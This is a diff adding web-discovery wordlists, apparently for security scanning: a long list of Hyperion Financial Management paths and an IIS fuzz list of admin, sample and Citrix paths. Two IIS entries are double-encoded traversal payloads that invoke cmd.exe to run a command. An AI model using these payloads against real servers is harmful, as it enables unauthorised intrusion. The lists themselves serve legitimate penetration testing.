+/HFM/Administration/RunningTasks.asp
+/HFM/Administration/ShowRunningTaskLog.asp
+/HFM/Administration/TaskAudit.asp
+/HFM/Administration/TaskAuditExport.asp
+/HFM/Administration/TaskProgress.asp
+/HFM/Administration/UsersOnSystem.asp
+/HFM/Calcman
+/HFM/Calcman/convxmltovbs.asp
+/HFM/Central
+/HFM/Central/Preferences
+/HFM/Central/Preferences/DefaultUserPreferences.asp
+/HFM/Central/Tasks
+/HFM/Central/Tasks/DisplayServers.asp
+/HFM/Central/Tasks/SelectApplication.asp
+/HFM/Central/Util
+/HFM/Central/Util//HFMCentralConstants.asp
+/HFM/Central/Util/HTML.asp
+/HFM/Central/Util/Launch/HFM.asp
+/HFM/Central/Util/ManageApplication.asp
+/HFM/Central/Util/VerifyUserOnApplication.asp
+/HFM/Common
+/HFM/Common/AdminUtility.asp
+/HFM/Common/Alerts.asp
+/HFM/Common/Async.asp
+/HFM/Common/Bottom.asp
+/HFM/Common/Calendar.asp
+/HFM/Common/CalendarPopup.asp
+/HFM/Common/ContextMenuSupport.asp
+/HFM/Common/CookieConstants.asp
+/HFM/Common/Core.asp
+/HFM/Common/Document.Asp
+/HFM/Common/Empty.html
+/HFM/Common/ErrorDetails.asp
+/HFM/Common/ErrorLog.asp
+/HFM/Common/FDMIntegrationUtil.asp
+/HFM/Common/FileAccess.asp
+/HFM/Common/GeneralUI.asp
+/HFM/Common/GlobalFunctions.asp
+/HFM/Common/HorzNav.asp
+/HFM/Common/HsvJSConstantsServer_Common.asp
+/HFM/Common/InlineComponentSupport.asp
+/HFM/Common/JSClientConstants.asp
+/HFM/Common/LogonOpenApp.asp
+/HFM/Common/Message.asp
+/HFM/Common/MessageDisplayFunctions.asp
+/HFM/Common/Metadata.asp
+/HFM/Common/MsgBox.Asp
+/HFM/Common/NumberStringsJavaScript.asp
+/HFM/Common/PopupBanners.asp
+/HFM/Common/POVFunctions.asp
+/HFM/Common/ProcessManagementConstants.asp
+/HFM/Common/ProdNav.asp
+/HFM/Common/Redirect.asp
+/HFM/Common/ResourceManager.xslt
+/HFM/Common/Resources.xslt
+/HFM/Common/ReSubmitWithPost.asp
+/HFM/Common/RoleIdsToResourceIds.xslt
+/HFM/Common/SecurityConstants.asp
+/HFM/Common/SecurityOptions.asp
+/HFM/Common/StringConstants.asp
+/HFM/Common/TabFunctions.asp
+/HFM/Common/TaskBoxUI.asp
+/HFM/Common/UserPOV.asp
+/HFM/Common/Utilities.asp
+/HFM/Common/WrkspcFuncs.asp
+/HFM/Common/XMLFunctions.asp
+/HFM/Common/XMLMetadata.asp
+/HFM/Common/XmlSsnState.asp
+/HFM/ConsolTemplate
+/HFM/ConsolTemplate/ConsolTemplate.asp
+/HFM/ConsolTemplate/ProcessTreeConsolTemplate.asp
+/HFM/CreateApp
+/HFM/CreateApp/CreateApp.asp
+/HFM/CreateApp/ProcessCreate.asp
+/HFM/Data
+/HFM/Data/AsyncPMAlert.asp
+/HFM/Data/CellHistory.asp
+/HFM/Data/DataAudit.asp
+/HFM/Data/DataAuditExport.asp
+/HFM/Data/DataExplorerCellAdjustments.asp
+/HFM/Data/DataExplorerCellInformation.asp
+/HFM/Data/DataExplorerCellText.asp
+/HFM/Data/DataExplorerGridDefPOVtoMbrSelPOV.xsl
+/HFM/Data/DataExplorerGridDefUpgrade.asp
+/HFM/Data/DataExplorerGridSettings.asp
+/HFM/Data/DataExplorerLineItemDetail.asp
+/HFM/Data/DataExplorerManageProcess.asp
+/HFM/Data/DataExplorerMbrSel.asp
+/HFM/Data/DataExplorerTransactions.asp
+/HFM/Data/DataExplorerUnassignedGroups.asp
+/HFM/Data/DataExplorerUserPOVSupport.asp
+/HFM/Data/DataGridCalcEPU.asp
+/HFM/Data/DBManagementClearData.asp
+/HFM/Data/DBManagementCopyData.asp
+/HFM/Data/DBManagementDeleteInvalidRecords.asp
+/HFM/Data/DBManagementObjects.asp
+/HFM/Data/DisplayColumns.asp
+/HFM/Data/EntityDetails.asp
+/HFM/Data/ExploreData.asp
+/HFM/Data/ExploreDataJava.asp
+/HFM/Data/FormInstructions.asp
+/HFM/Data/FormViewDef.asp
+/HFM/Data/HsvJSConstantsServer_Data.asp
+/HFM/Data/HsvJSConstantsServer_ProcFlow.asp
+/HFM/Data/ImportWDEFFromExcel.asp
+/HFM/Data/LineItems.asp
+/HFM/Data/MultiPhaseOptions.asp
+/HFM/Data/MultiPhaseProcessControlPanelColOptions.asp
+/HFM/Data/MultiPhaseProcessControlPanelRowOptions.asp
+/HFM/Data/OverlappedConsolidationInfo.asp
+/HFM/Data/PhaseOptions.asp
+/HFM/Data/PostToAuditIntersectionUrl.asp
+/HFM/Data/ProcessControlEmail.xsl
+/HFM/Data/ProcessControlMultiPanelFlowManagement.asp
+/HFM/Data/ProcessControlPanel.asp
+/HFM/Data/ProcessControlPanelCalcSummary.asp
+/HFM/Data/ProcessControlPanelFlowManagement.asp
+/HFM/Data/ProcessControlPanelMbrSel.asp
+/HFM/Data/ProcessControlPanelMulti.asp
+/HFM/Data/ProcessControlPanelMultiColOptions.asp
+/HFM/Data/ProcessControlPanelMultiMbrSel.asp
+/HFM/Data/ProcessControlPanelMultiRowOptions.asp
+/HFM/Data/ProcessControlPanelOptions.asp
+/HFM/Data/ProcessControlTask.asp
+/HFM/Data/ProcessDocMgrSaveWebGrid.asp
+/HFM/Data/ProcessEntityDetails.asp
+/HFM/Data/ProcessImportWDEFFromExcel.asp
+/HFM/Data/ProcessLineItems.asp
+/HFM/Data/ProcessProcFlowManagement.asp
+/HFM/Data/ProcessSummary.asp
+/HFM/Data/ProcessSummaryColOptions.asp
+/HFM/Data/ProcessSummaryRowOptions.asp
+/HFM/Data/ProcessUserPreferences.asp
+/HFM/Data/ProcFlowHistory.asp
+/HFM/Data/ProcFlowManagement.asp
+/HFM/Data/ProcMgtCalcEPU.asp
+/HFM/Data/SubmissionPhase.asp
+/HFM/Data/SubmissionPhaseMbrSel.asp
+/HFM/Data/Transactions.asp
+/HFM/Data/UserPreferences.asp
+/HFM/Data/WDEFAddMember.asp
+/HFM/Data/WDEFColScript.asp
+/HFM/Data/WDEFConstants.asp
+/HFM/Data/wdefExcel.xslt
+/HFM/Data/WdefInterface.asp
+/HFM/Data/wdef_print.xslt
+/HFM/Data/wdef.xslt
+/HFM/Data/WebFormBuilder.asp
+/HFM/Data/WebFormCellProp.asp
+/HFM/Data/WebFormCellText.asp
+/HFM/Data/WebFormClientScript.asp
+/HFM/Data/WebFormGenerated.asp
+/HFM/Data/WebFormLineItems.asp
+/HFM/Data/WebFormProcessFDMLaunch.asp
+/HFM/Data/XMLDataGrid.asp
+/HFM/default.asp
+/HFM/DeleteApp
+/HFM/DeleteApp/DeleteApp.asp
+/HFM/DeleteApp/DisplayServers.asp
+/HFM/DeleteApp/ProcessDelete.asp
+/HFM/DocMgr
+/HFM/DocMgr/AddToFavorites.asp
+/HFM/DocMgr/AddToWorkspace.asp
+/HFM/DocMgr/DeleteItems.asp
+/HFM/DocMgr/DocMgr.asp
+/HFM/DocMgr/DocMgrCommon.asp
+/HFM/DocMgr/DocMgrConstants.asp
+/HFM/DocMgr/DocMgrDownloadDoc.asp
+/HFM/DocMgr/DocMgrSave2.asp
+/HFM/DocMgr/DocMgrSave.asp
+/HFM/DocMgr/DocMgrSaveGrid.asp
+/HFM/DocMgr/DocMgrSaveProcess.asp
+/HFM/DocMgr/DownloadItem.asp
+/HFM/DocMgr/ExtractItems.asp
+/HFM/DocMgr/Favorites.asp
+/HFM/DocMgr/FavoritesInclude.asp
+/HFM/DocMgr/Link.asp
+/HFM/DocMgr/LoadFiles_Add.asp
+/HFM/DocMgr/LoadFiles_Add_Process.asp
+/HFM/DocMgr/LoadFiles_Process.asp
+/HFM/DocMgr/NewFolder.asp
+/HFM/DocMgr/NewFolder_Process.asp
+/HFM/DocMgr/NewItem.asp
+/HFM/DocMgr/OpenItem.asp
+/HFM/DocMgr/OpenItemDirect.asp
+/HFM/DocMgr/RelatedContent.asp
+/HFM/DocMgr/RelatedContentXml.asp
+/HFM/DocMgr/TaskList.asp
+/HFM/Downloads
+/HFM/Downloads/j2re-1_3_1_04-windows-i586-i.exe
+/HFM/EIE
+/HFM/EIE/AccountCS2/HFM.xsl
+/HFM/EIE/ApplicationCS2/HFM.xsl
+/HFM/EIE/CASRedirector.asp
+/HFM/EIE/CESAgent.asp
+/HFM/EIE/CESMbrSel.asp
+/HFM/EIE/CESTask2/HFMTask.xslt
+/HFM/EIE/Configuration.xsd
+/HFM/EIE/ConsolidationMethod.xsd
+/HFM/EIE/ConsolMethodsCS2/HFM.xsl
+/HFM/EIE/Cube.xsd
+/HFM/EIE/CurrencyCS2/HFM.xsl
+/HFM/EIE/CustomCS2/HFM.xsl
+/HFM/EIE/DataBrokerListener.asp
+/HFM/EIE/Dimension4All.xslt
+/HFM/EIE/Dimension.xsd
+/HFM/EIE/EIEFunctions.asp
+/HFM/EIE/EIEListener.asp
+/HFM/EIE/EIERedirector.asp
+/HFM/EIE/EIERegisterApplication.asp
+/HFM/EIE/EntityCS2/HFM.xsl
+/HFM/EIE/GenericDimCS2/HFM.xsl
+/HFM/EIE//HFMAwbListener.asp
+/HFM/EIE//HFMOfficeProvider.xslt
+/HFM/EIE/HubProdNav.asp
+/HFM/EIE/ICPCS2/HFM.xsl
+/HFM/EIE/ManageSmartview.asp
+/HFM/EIE/ScenarioCS2/HFM.xsl
+/HFM/EIE/SmartViewProviderReg.asp
+/HFM/EIE/ValueCS2/HFM.xsl
+/HFM/ExtendedAnalytics
+/HFM/ExtendedAnalytics/ExtendedAnalytics.asp
+/HFM/favicon.ico
+/HFM/FileTransfer
+/HFM/FileTransfer/DownloadFile.asp
+/HFM/global.asa
+/HFM/GlobalNav
+/HFM/GlobalNav/DefaultGlobalNavContent.asp
+/HFM/GlobalNav/GlobalNav.asp
+/HFM/GlobalNav/GlobalNavContentSupport.asp
+/HFM/GlobalNav/GlobalNavInlineComponents.asp
+/HFM/GlobalNav//HFMStaticObjectList.xml
+/HFM/GlobalNav/XMLObjectPalette.asp
+/HFM/GlobalWorkspaceNav
+/HFM/GlobalWorkspaceNav/bpm
+/HFM/GlobalWorkspaceNav/bpm/conf
+/HFM/GlobalWorkspaceNav/bpm/conf//HFMConfig.xml
+/HFM/GlobalWorkspaceNav/bpm/modules
+/HFM/GlobalWorkspaceNav/bpm/modules/com
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/appcontainer
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/appcontainer/Adf.asp
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/prefs
+/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/prefs/Adf.asp
+/HFM/GlobalWorkspaceNav/bpm/resources
+/HFM/GlobalWorkspaceNav/bpm/resources/da
+/HFM/GlobalWorkspaceNav/bpm/resources/de
+/HFM/GlobalWorkspaceNav/bpm/resources/en
+/HFM/GlobalWorkspaceNav/bpm/resources/es
+/HFM/GlobalWorkspaceNav/bpm/resources/fr
+/HFM/GlobalWorkspaceNav/bpm/resources/it
+/HFM/GlobalWorkspaceNav/bpm/resources/ja
+/HFM/GlobalWorkspaceNav/bpm/resources/ko
+/HFM/GlobalWorkspaceNav/bpm/resources/ru
+/HFM/GlobalWorkspaceNav/bpm/resources/sv
+/HFM/GlobalWorkspaceNav/bpm/resources/tr
+/HFM/GlobalWorkspaceNav/bpm/resources/zh-CN
+/HFM/GlobalWorkspaceNav/bpm/resources/zh-TW
+/HFM/GlobalWorkspaceNav/DefaultGlobalNavContent.asp
+/HFM/GlobalWorkspaceNav/GlobalNav.asp
+/HFM/GlobalWorkspaceNav/GlobalNavContentSupport.asp
+/HFM/GlobalWorkspaceNav/GlobalNavInlineComponents.asp
+/HFM/GlobalWorkspaceNav//HFMStaticObjectList.xml
+/HFM/GlobalWorkspaceNav/ProcessCloseApp.asp
+/HFM/GlobalWorkspaceNav/UserAppPrefs.asp
+/HFM/GlobalWorkspaceNav/UserPreferences.asp
+/HFM/GlobalWorkspaceNav/XMLObjectPalette.asp
+/HFM//HFMOfficeProviderSetup
+/HFM//HFMOfficeProviderSetup//HFMOfficeProviderSetup.msi
+/HFM//HFMOfficeProviderSetup/Launch/HFMOfficeProviderSetup.vbs
+/HFM//HFMOfficeProviderSetup/setup.exe
+/HFM/Home
+/HFM/Home/About/HFM.asp
+/HFM/Home/AdminHome.asp
+/HFM/Home/CustomUI.asp
+/HFM/Home/Home.asp
+/HFM/Home/LaunchPage.asp
+/HFM/Home/MakeDefault.asp
+/HFM/Home/MakeDefaultConstants.asp
+/HFM/Home/MakeDefaultFunctions.asp
+/HFM/Home/NewHome.asp
+/HFM/Home/ProductRedirect.asp
+/HFM/Home/ProductWindow.asp
+/HFM/Home/Report_Error.asp
+/HFM/Home/ReportForward.asp
+/HFM/Home/ReportWindow.asp
+/HFM/Images
+/HFM/Images/bnr_about.bmp
+/HFM/Images/btn_process_1.bmp
+/HFM/Images/btn_process_2.bmp
+/HFM/Images/btn_process_3.bmp
+/HFM/Images/btn_process_4.bmp
+/HFM/Images/btn_process_5.bmp
+/HFM/Images/CROSS01.CUR
+/HFM/Images/CROSS02.CUR
+/HFM/Images/CROSS03.CUR
+/HFM/Images/CROSS04.CUR
+/HFM/Images/horznav_lev0_sel_pic_0.psd
+/HFM/Images/journal1.bmp
+/HFM/Images/journal2.bmp
+/HFM/Images/MAIL.BMP
+/HFM/IntercompanyTransactions
+/HFM/IntercompanyTransactions/AsyncIctAlert.asp
+/HFM/IntercompanyTransactions/AutoMatch.asp
+/HFM/IntercompanyTransactions/DrillDownTransactionReport.asp
+/HFM/IntercompanyTransactions/ICAlertOptions.asp
+/HFM/IntercompanyTransactions/ICMDrillDownTransactionReport.asp
+/HFM/IntercompanyTransactions/ICMonitorDetail.asp
+/HFM/IntercompanyTransactions/ICMonitorDetails.xsl
+/HFM/IntercompanyTransactions/ICMonitorReport.asp
+/HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.asp
+/HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.xsl
+/HFM/IntercompanyTransactions/ICReports.xsl
+/HFM/IntercompanyTransactions/ICTransactionsColumnFilter.asp
+/HFM/IntercompanyTransactions/ICTransactionsCommon.asp
+/HFM/IntercompanyTransactions/ICTransActionStatus.asp
+/HFM/IntercompanyTransactions/ICTransactionSummary.asp
+/HFM/IntercompanyTransactions/ICTransColumnFilter.xsl
+/HFM/IntercompanyTransactions/ICTransMatchingReportGeneral.asp
+/HFM/IntercompanyTransactions/ICTReportProcessor.asp
+/HFM/IntercompanyTransactions/LoadTransactions.xsl
+/HFM/IntercompanyTransactions/LockUnlockEntities.asp
+/HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.asp
+/HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.xsl
+/HFM/IntercompanyTransactions/LockUnlockEntities.xsl
+/HFM/IntercompanyTransactions/ManageICPeriods.asp
+/HFM/IntercompanyTransactions/ManageICPeriods.xsl
+/HFM/IntercompanyTransactions/ManageReasonCodes.asp
+/HFM/IntercompanyTransactions/ManageReasonCodes.xsl
+/HFM/IntercompanyTransactions/ManualMatchStatus.asp
+/HFM/IntercompanyTransactions/MonitorICTransactions.asp
+/HFM/IntercompanyTransactions/MonitorICTrans.xsl
+/HFM/IntercompanyTransactions/MultiICTReportProcessor.asp
+/HFM/IntercompanyTransactions/NewEditICTransaction.asp
+/HFM/IntercompanyTransactions/ProcessICTransactions.asp
+/HFM/IntercompanyTransactions/ProcessICTrans.xsl
+/HFM/IntercompanyTransactions/ProcessTransAction.xsl
+/HFM/IntercompanyTransactions/ReportByAcct.asp
+/HFM/IntercompanyTransactions/ReportByID.asp
+/HFM/IntercompanyTransactions/ReportHeader.xsl
+/HFM/IntercompanyTransactions/ReportSection.xsl
+/HFM/IntercompanyTransactions/SetICReasonCodes.asp
+/HFM/IntercompanyTransactions/UnmatchICTransactions.asp
+/HFM/IntercompanyTransactions/UnmatchICTransactions.xsl
+/HFM/IntercompanyTransactions/XslObjects.asp
+/HFM/Java
+/HFM/Java/classes
+/HFM/Java/classes//HFMJavaWebComponents.jar
+/HFM/Java/classes/xerces
+/HFM/Java/classes/xerces/xercesImpl.jar
+/HFM/Java/classes/xerces/xmlParserAPIs.jar
+/HFM/Journals
+/HFM/Journals//HFM_PrintSingleJournal.xsl
+/HFM/Journals//HFM_PrintSingleTemplate.xsl
+/HFM/Journals/JournalEntry.asp
+/HFM/Journals/Journals2.asp
+/HFM/Journals/JournalsAction.asp
+/HFM/Journals/JournalsCommon.asp
+/HFM/Journals/JournalsDefColumns.asp
+/HFM/Journals/JournalsDefFilter.asp
+/HFM/Journals/JournalsDefProperties.asp
+/HFM/Journals/JournalsMain.asp
+/HFM/Journals/JournalsNew.asp
+/HFM/Journals/ManageGroups.asp
+/HFM/Journals/ManagePeriods.asp
+/HFM/Journals/OpenJournal.asp
+/HFM/Journals/OpenTemplate.asp
+/HFM/Journals/PrintSingleJournal.asp
+/HFM/Journals/ProcessFilterGetEntity.asp
+/HFM/Journals/ProcessJournalEntry.asp
+/HFM/Journals/ProcessJournalsPOV.asp
+/HFM/Journals/ProcessJournalsQueryDef.asp
+/HFM/Journals/ProcessLIPOVJournals.asp
+/HFM/Journals/ProcessManagePeriods.asp
+/HFM/Journals/ProcessMbrSelClickMain.asp
+/HFM/Journals/ProcessPOVForGeneration.asp
+/HFM/Journals/ProcessTemplateEntry.asp
+/HFM/Journals/QueryDef.asp
+/HFM/Journals/TemplateEntry.asp
+/HFM/Journals/TemplatesAction.asp
+/HFM/Journals/TemplatesMain.asp
+/HFM/Journals/TemplatesNew.asp
+/HFM/LoadExtract
+/HFM/LoadExtract/downloadictlog.asp
+/HFM/LoadExtract/ExtractData.asp
+/HFM/LoadExtract/ExtractJournals.asp
+/HFM/LoadExtract/ExtractMemberLists.asp
+/HFM/LoadExtract/ExtractMetaData.asp
+/HFM/LoadExtract/ExtractRules.asp
+/HFM/LoadExtract/ExtractSecurity.asp
+/HFM/LoadExtract/ExtractTransactions.asp
+/HFM/LoadExtract/HsvJSConstantsServer_LoadExtract.asp
+/HFM/LoadExtract/loaddata.asp
+/HFM/LoadExtract/LoadJournals.asp
+/HFM/LoadExtract/LoadMemberLists.asp
+/HFM/LoadExtract/loadmeta.asp
+/HFM/LoadExtract/loadmeta_options.asp
+/HFM/LoadExtract/LoadRules.asp
+/HFM/LoadExtract/LoadSecurity.asp
+/HFM/LoadExtract/LoadTransactions.asp
+/HFM/LoadExtract/ProcessExtractJournals.asp
+/HFM/LoadExtract/ProcessExtractMemberlists.asp
+/HFM/LoadExtract/ProcessExtractMetaData.asp
+/HFM/LoadExtract/ProcessExtractRules.asp
+/HFM/LoadExtract/ProcessExtractSecurity.asp
+/HFM/LoadExtract/processExtractTransactions.asp
+/HFM/LoadExtract/ProcessJournalsExtractTree.asp
+/HFM/LoadExtract/ProcessLoadData.asp
+/HFM/LoadExtract/ProcessLoadJournals.asp
+/HFM/LoadExtract/ProcessLoadMemberLists.asp
+/HFM/LoadExtract/ProcessLoadRules.asp
+/HFM/LoadExtract/ProcessLoadSecurity.asp
+/HFM/LoadExtract/ProcessLoadTransactions.asp
+/HFM/LoadExtract/ProcessTransactionsExtractTree.asp
+/HFM/Logon
+/HFM/Logon/AuthenticateUser.asp
+/HFM/Logon/Logoff.asp
+/HFM/Logon/ProcessLogoff.asp
+/HFM/Logon/ProcessLogon.asp
+/HFM/Logon/SSO.asp
+/HFM/MbrSel
+/HFM/MbrSel/MbrSel.asp
+/HFM/MbrSel/MbrSel_Include.asp
+/HFM/MbrSel/MbrSel_Test.asp
+/HFM/MbrSel/MbrSelXml.asp
+/HFM/OpenApp
+/HFM/OpenApp/appopen.asp
+/HFM/OpenApp/CloseApp.asp
+/HFM/OpenApp/CloseApplication.asp
+/HFM/OpenApp/DisplayServers.asp
+/HFM/OpenApp/HsvJSConstantsServer_OpenApp.asp
+/HFM/OpenApp/OpenAppDirect.asp
+/HFM/OpenApp/ReopenAppDirect.asp
+/HFM/OpenApp/SelectApp.asp
+/HFM/OpenApp/SelectServer.asp
+/HFM/OpenApp/ServerStatus.asp
+/HFM/OpenApp/StartPage.asp
+/HFM/OwnershipManagement
+/HFM/OwnershipManagement/DisplayColumns.asp
+/HFM/OwnershipManagement/EPUFilterOptions.asp
+/HFM/OwnershipManagement/EPUReport.asp
+/HFM/OwnershipManagement/EPU_Report.xsl
+/HFM/OwnershipManagement/EPU.xsl
+/HFM/OwnershipManagement/ManageEPU.asp
+/HFM/OwnershipManagement/OwnershipManagement.asp
+/HFM/OwnershipManagement/ProcessCalcEPU.asp
+/HFM/OwnershipManagement/ProcessSharesCalculation.asp
+/HFM/OwnershipManagement/SharesCalculation.asp
+/HFM/POV
+/HFM/POV/POVCommon.asp
+/HFM/POV/povfinishpage.asp
+/HFM/POV/POVRequestData.asp
+/HFM/POV/povstartpage.asp
+/HFM/ProcessManagement
+/HFM/ProcessManagement/ProcessFlowHistory.asp
+/HFM/ProcessManagement/ProcessFlowManagement.asp
+/HFM/ProcessManagement/ProcessFlowValidationDetail.asp
+/HFM/ProcessManagement/ProcessManagement.asp
+/HFM/ProcessManagement/ProcessManagementSummary.asp
+/HFM/Reports
+/HFM/Reports/AddICPAccount.asp
+/HFM/Reports/checkStatus.asp
+/HFM/Reports/DynamicICP.asp
+/HFM/Reports/EditReport.asp
+/HFM/Reports/HsvJSConstantsServer_Reports.asp
+/HFM/Reports/ICPCommon.asp
+/HFM/Reports/ICPReportBuilder.asp
+/HFM/Reports/ICPReports.asp
+/HFM/Reports/OpenLocalReports.asp
+/HFM/Reports/OpenRemoteReport.asp
+/HFM/Reports/OpenRemoteReports.asp
+/HFM/Reports/PrintJournalReportOverride.asp
+/HFM/Reports/PrintReports.asp
+/HFM/Reports/ProcessICPGetEntity.asp
+/HFM/Reports/ProcessICPPOV.asp
+/HFM/Reports/ProcessICPReports.asp
+/HFM/Reports/ProcessJournalReports.asp
+/HFM/Reports/ProcessJournalReportsPov.asp
+/HFM/Reports/ProcessOpenLocalReports.asp
+/HFM/Reports/ReportFormatOptions.asp
+/HFM/Reports/SaveJournalReportLocal.asp
+/HFM/Reports/SaveLocal.asp
+/HFM/Security
+/HFM/Security/bpm
+/HFM/Security/bpm/asp
+/HFM/Security/bpm/asp/tree.asp
+/HFM/Security/bpm/BpmLauncher.asp
+/HFM/Security/bpm/BpmLauncher.xml
+/HFM/Security/bpm/BpmUi_Version.xml
+/HFM/Security/bpm/conf
+/HFM/Security/bpm/conf/BpmContextConfig.xml
+/HFM/Security/bpm/conf/BpmContextConfig.xsd
+/HFM/Security/bpm/conf/BpmDebugConfig.xml
+/HFM/Security/bpm/conf/BpmReleaseConfig.xml
+/HFM/Security/bpm/conf//HFMConfig.xml
+/HFM/Security/bpm/launcher.asp
+/HFM/Security/bpm/modules
+/HFM/Security/bpm/modules/com
+/HFM/Security/bpm/modules/com/hyperion
+/HFM/Security/bpm/modules/com/hyperion/bpm
+/HFM/Security/bpm/modules/com/hyperion/bpm/web
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard/Adf.asp
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/Adf.asp
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header
+/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header/header.inc
+/HFM/Security/bpm/modules/com/hyperion//HFM
+/HFM/Security/bpm/modules/com/hyperion//HFM/web
+/HFM/Security/bpm/modules/com/hyperion//HFM/web/appcontainer
+/HFM/Security/bpm/modules/com/hyperion//HFM/web/appcontainer/Adf.asp
+/HFM/Security/bpm/modules/com/hyperion//HFM/web/prefs
+/HFM/Security/bpm/modules/com/hyperion//HFM/web/prefs/Adf.asp
+/HFM/Security/bpm/resources
+/HFM/Security/conf
+/HFM/Security/conf//HFMConfig.xml
+/HFM/Security/createSecurityClass.asp
+/HFM/Security/deleteSecurityClass.asp
+/HFM/Security/GetClasses.asp
+/HFM/Security/getRightsAndRoles.asp
+/HFM/Security/getRights.asp
+/HFM/Security/getRoles.asp
+/HFM/Security/GetUsers.asp
+/HFM/Security/getUsersInGroup.asp
+/HFM/Security/modules
+/HFM/Security/modules/com
+/HFM/Security/modules/com/hyperion
+/HFM/Security/modules/com/hyperion//HFM
+/HFM/Security/modules/com/hyperion//HFM/web
+/HFM/Security/modules/com/hyperion//HFM/web/security
+/HFM/Security/modules/com/hyperion//HFM/web/security/appnode
+/HFM/Security/modules/com/hyperion//HFM/web/security/appnode/Adf.asp
+/HFM/Security/modules/com/hyperion//HFM/web/security/assign
+/HFM/Security/modules/com/hyperion//HFM/web/security/assign/Adf.asp
+/HFM/Security/modules/com/hyperion//HFM/web/security/assign/AssignRights.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/assign/DataSet.xml
+/HFM/Security/modules/com/hyperion//HFM/web/security/assign/DataSet.xsd
+/HFM/Security/modules/com/hyperion//HFM/web/security/classes
+/HFM/Security/modules/com/hyperion//HFM/web/security/classes/Adf.asp
+/HFM/Security/modules/com/hyperion//HFM/web/security/classes/Classes.xsd
+/HFM/Security/modules/com/hyperion//HFM/web/security/report
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/Adf.asp
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserGroupCSV.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserGroupHTML.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsAndRolesCSV.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsAndRolesHTML.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsCSV.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsHTML.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRolesCSV.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRolesHTML.xsl
+/HFM/Security/modules/com/hyperion//HFM/web/security/users
+/HFM/Security/modules/com/hyperion//HFM/web/security/users/Adf.asp
+/HFM/Security/modules/com/hyperion//HFM/web/security/users/Users.xsd
+/HFM/Security/olapsample.csv
+/HFM/Security/saveAsCsv.asp
+/HFM/Security/saveRights.asp
+/HFM/Security/securityAssignmentWizard.asp
+/HFM/Security/setSelectedClasses.asp
+/HFM/Security/setSelectedUsers.asp
+/HFM/Security/TestSecurityHarness.asp
+/HFM/ThirdParty
+/HFM/ThirdParty/Bindows
+/HFM/ThirdParty/Bindows/html
+/HFM/ThirdParty/Bindows/html/bimain.html
+/HFM/ThirdParty/Bindows/html/BiWsdlBuiltinTypes.xsd
+/HFM/ThirdParty/Bindows/html/blank.html
+/HFM/Workspace
+/HFM/Workspace/EmptyWorkspace.asp
+/HFM/Workspace/Preferences.asp
+/HFM/Workspace/Workspace.asp
+/HFM/Workspace/WorkspaceCommon.asp
+/HFM/Workspace/WorkspaceFlow.asp

Discovery/IIS.fuzz.txt

@@ -0,0 +1,186 @@
+/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/a%5c.aspx
+/AccessPlatform/
+/AccessPlatform/auth/
+/AccessPlatform/auth/clientscripts/
+/AccessPlatform/auth/clientscripts/cookies.js 
+/AccessPlatform/auth/clientscripts/login.js 
+/admin/
+/administration/
+/administrator/
+/Admin/knowledge/dsmgr/users/GroupManager.asp
+/Admin/knowledge/dsmgr/users/UserManager.asp
+/adovbs.inc
+/adsamples/
+/AdvWorks/equipment/catalog_type.asp
+/ajfhasdfgsagfakjhgd
+/archi~1/
+/Archi~1/
+/aspnet_files/
+/asp/
+/asps/
+/ASPSamp/AdvWorks/equipment/catalog_type.asp
+/_AuthChangeUrl?
+/bin/
+/bins/
+/certcontrol/
+/certenroll/
+/certsrv/
+/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/CFIDE/Administrator/startstop.html
+/cgi
+/cgi-bin/a1stats/a1disp.cgi
+/cgi-bin/htimage.exe?2,2
+/cgi-bin/htmlscript
+/cgi-bin/imagemap.exe?2,2
+/checkapache.html
+/citrix/
+/citrix/AccessPlatform/auth/
+/citrix/AccessPlatform/auth/clientscripts/
+/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
+/Citrix/AccessPlatform/auth/clientscripts/login.js 
+/Citrix/PNAgent/config.xml
+/clocktower
+/cmsample/
+/db/
+/domcfg.nsf/?open
+/Exadmin/
+/Exchange/
+/exchange/root.asp
+/ExchWeb/
+/forum_arc.asp
+/forum.asp
+/forum_professionnel.asp
+/help/
+/iiasdmpwd/
+/iisadmin/
+/iisadmpwd/achg.htr
+/iisadmpwd/aexp2b.htr
+/iisadmpwd/aexp2.htr
+/iisadmpwd/aexp3.htr
+/iisadmpwd/aexp4b.htr
+/iisadmpwd/aexp4.htr
+/iisadmpwd/aexp.htr
+/iisadmpwd/anot3.htr
+/iisadmpwd/anot.htr
+/iishelp/
+/iishelp/iis/misc/default.asp
+/iissamples/
+/iissamples/exair/howitworks/Code.asp
+/iissamples/exair/howitworks/Codebrw1.asp
+/iissamples/exair/howitworks/Codebrws.asp
+/iissamples/sdk/asp/docs/codebrw2.asp
